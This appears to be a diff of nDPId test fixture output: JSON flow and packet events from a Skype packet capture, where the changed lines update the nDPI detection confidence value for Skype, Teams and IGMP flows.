+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAABBojAAAEARjU7AqAEi1cezmzLdnEQALVYJm\/gCocGAOu9ctMRuZg09sIXFBXfoFp0ezBOePl8z3klTgDOO8A=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAABA4LIAAEARBt3AqAEinTg0GzLdnFsALK5Hm\/oC27Di400dfPUDJrwFd8eoU\/psKrn9OzjyFuH7NFUpoc4x"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyTM0AAEAR4z7AqAEinTfrrTLdnEwAHgM8m\/wCyw55OL3+chZLjMlighndXw9\/qA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5cNoAAEARvzrAqAEinTfrnTLdnEoAJXKym\/4Cz\/csSQ42SRwcVm84KNSC1Bge6u0+CtZPiaQ="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431969664357,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969664357,"pkt":"AQBeAAABoPPBbTu2CABGrAAgAAAAAAECgoTAqAD+4AAAAZQEAAARZO6bAAAAAA=="} -00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8z44AAEARX+vAqAEi1cezpTLdnEcAKEGUnAACQndt5hKcGQjs\/aUFepuMkaIJ9906aCWz4pv6M2E="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyGYIAAEARfyPAqAEiQTffFDLdnGEAHnjQnAICuB3xnzqHf8BCJKQQ6ooGPwkzRg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3zjoAAEARkxnAqAEiQAQXlDLdnEoAI3yfnAQC5t7RxPpucIQEcbOpo3n\/i37I7X5QLz7O"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3gRQAAEARembAqAEib91NlDLdnF0AI32wnAYCAtkwZfUpvy0PrMgHjjv7gkQ5J07OrfdX"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1GOEAAEAR4qLAqAEib91NjTLdnFQAIf21nAgChdWCG2VT3PvRM4JN\/HMVRe1geqFvmA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"} 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 